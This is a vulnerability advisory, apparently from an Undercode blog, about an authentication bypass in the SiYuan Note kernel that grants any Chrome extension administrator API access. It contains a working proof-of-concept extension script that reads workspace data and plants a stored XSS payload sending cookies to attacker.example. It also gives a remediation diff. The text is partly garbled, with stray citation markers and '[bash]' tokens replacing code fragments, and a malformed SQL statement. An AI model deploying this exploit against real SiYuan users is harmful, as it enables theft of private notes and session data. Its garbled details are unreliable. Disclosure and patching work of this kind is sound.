Listen to this Post
The SiYuan Note kernel HTTP server contains a critical authentication bypass vulnerability stemming from an overly permissive trust of the `chrome-extension://` origin scheme. In the `CheckAuth` middleware, defined in `kernel/model/session.go` at line 277, the code explicitly exempts all origins beginning with `chrome-extension://` from any authentication checks【1†L18-L21】. This is implemented via a simple string prefix check, meaning any extension origin, regardless of its specific ID, is granted a free pass.
Upon detecting this origin, the middleware proceeds to assign the request the highest privilege level, RoleAdministrator, at line 284 of the same file【1†L22-L23】. This effectively grants any browser extension full administrative control over the SiYuan kernel API. The situation is exacerbated by the default configuration of the desktop application. The `AccessAuthCode` field, which is intended to provide a layer of token-based security, defaults to an empty string for desktop installs (ContainerStd)【1†L24-L26】. When this field is empty, the kernel performs no token validation, leaving the API completely exposed.
The combination of these two flaws creates a severe security hole. Any Chrome or Chromium extension, even those with no special `host_permissions` declared in their manifest, can make fully authenticated admin API calls to the kernel listening on 127.0.0.1:6806【1†L5-L8】【1†L27-L28】. An attacker could exploit this by compromising a legitimate extension through a supply chain attack or by creating a malicious extension that requires zero special permissions to function. This allows for a wide range of malicious activities, including data exfiltration, stored XSS injection, and configuration tampering, all from the context of a seemingly benign browser add-on【1†L5-L8】.
DailyCVE Form
Platform: ……. SiYuan Note
Version: …….. v3.6.5 (and below)
Vulnerability :…… CWE-346 Origin Validation
Severity: ……. Critical (9.8 CVSS)
date: ………. July 10, 2026
Prediction: …… Expected August 2026
What Undercode Say: Analytics
The vulnerability is rooted in a fundamental flaw in origin-based authentication. The `CheckAuth` function in `kernel/model/session.go` uses a weak trust boundary.
Vulnerable Code Snippet:
// kernel/model/session.go
func CheckAuth(c gin.Context) {
origin := c.GetHeader("Origin")
if strings.HasPrefix(origin, "chrome-extension://") {
// Allow chrome extension requests
// [bash]: No further validation is performed.
} else if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return
}
// ...
c.Set("role", model.RoleAdministrator) // [bash]: Grants admin role
}
Exploit Commands and PoC:
A minimal Chrome extension with only default permissions can trigger the vulnerability. The following background script (bg.js) demonstrates the exploit:
// bg.js -- runs as chrome-extension://<id>
// No special host_permissions needed
// 1. Verify admin access
fetch('http://127.0.0.1:6806/api/system/getConf', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '{}'
}).then(r => r.json()).then(data => {
console.log('[bash] Admin API access confirmed:', data.code === 0);
});
// 2. Exfiltrate workspace data
fetch('http://127.0.0.1:6806/api/query/sql', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ stmt: 'SELECT FROM blocks LIMIT 100' })
}).then(r => r.json()).then(data => {
console.log('[bash] Exfiltrated blocks:', data.data?.length);
});
// 3. Inject stored XSS payload into a note
fetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ notebook: '', path: '/' })
}).then(r => r.json()).then(tree => {
const firstDoc = tree.data?.files?.[bash];
if (!firstDoc) return;
fetch('http://127.0.0.1:6806/api/block/insertBlock', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
dataType: 'markdown',
data: '<img src=x onerror="fetch(\'https://attacker.example/steal?data=\'+document.cookie)">',
parentID: firstDoc.id
})
});
});
Exploit
An attacker can exploit this vulnerability by getting a user to install a malicious Chrome extension or by compromising a legitimate one. Because the extension requires zero special permissions, it can easily bypass Chrome Web Store review processes or be distributed via social engineering【1†L30-L33】. Once installed, the extension’s background script can make arbitrary authenticated requests to the local SiYuan kernel. The `chrome-extension://` origin header is automatically sent by the browser, and the server’s flawed logic grants it `RoleAdministrator` without any token check, enabling full control over the application【1†L30-L33】.
Protection
To protect against this vulnerability, users should immediately update to a patched version of SiYuan Note once it becomes available. As a temporary mitigation, users can set a non-empty `AccessAuthCode` in the kernel configuration, although this may not be a complete solution if the configuration itself can be tampered with. The ultimate fix requires a code change to remove the blanket `chrome-extension://` allowlist and implement a proper per-session token exchange mechanism【1†L47-L57】.
Suggested Remediation (Code Patch):
a/kernel/model/session.go
+++ b/kernel/model/session.go
@@ -274,9 +274,6 @@
func CheckAuth(c gin.Context) {
origin := c.GetHeader("Origin")
- if strings.HasPrefix(origin, "chrome-extension://") {
- // Allow chrome extension requests
- } else
if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return
Additionally, implement a secure pairing mechanism for any required extension access【1†L54-L57】.
Impact
- Unauthenticated Admin API Access: Any installed browser extension can gain full control of the SiYuan kernel without any authentication【1†L35】.
- Data Exfiltration: Full workspace data can be stolen via API endpoints like
/api/query/sql,/api/filetree/, and/api/export/【1†L36】. - Stored XSS Injection: Malicious scripts can be injected into notes via admin APIs (
/api/block/insertBlock,/api/attr/setBlockAttrs), leading to persistent attacks【1†L37】. - Configuration Tampering: Attackers can modify system settings via `/api/system/setConf` to maintain persistence or expand the attack surface【1†L38】.
- Supply Chain Amplification: A single compromised popular Chrome extension update could silently exploit every SiYuan desktop user【1†L39】.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

